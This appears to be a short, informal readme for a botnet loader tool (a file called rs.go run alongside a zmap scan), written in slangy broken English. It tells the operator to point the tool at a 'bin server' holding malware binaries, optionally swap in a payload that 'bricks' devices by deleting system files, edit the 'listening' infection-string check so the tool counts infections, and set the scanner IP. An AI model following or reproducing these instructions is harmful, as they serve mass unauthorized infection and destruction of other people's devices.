justr edit the rs file with the bin server where u see the bins or u can input custom payload if u want to brick it rm the system files
		if strings.Contains(string(buf), "listening") {
thats ur infection string change it if u want rs.go to output u how much infections it made durring its zmap run , just be aware thise are saturated so the count might not be exactly the same

abit above listening or below idk 2 lazy to check is ur scanner ip just change it dont confuse it with the payload or u wont get shit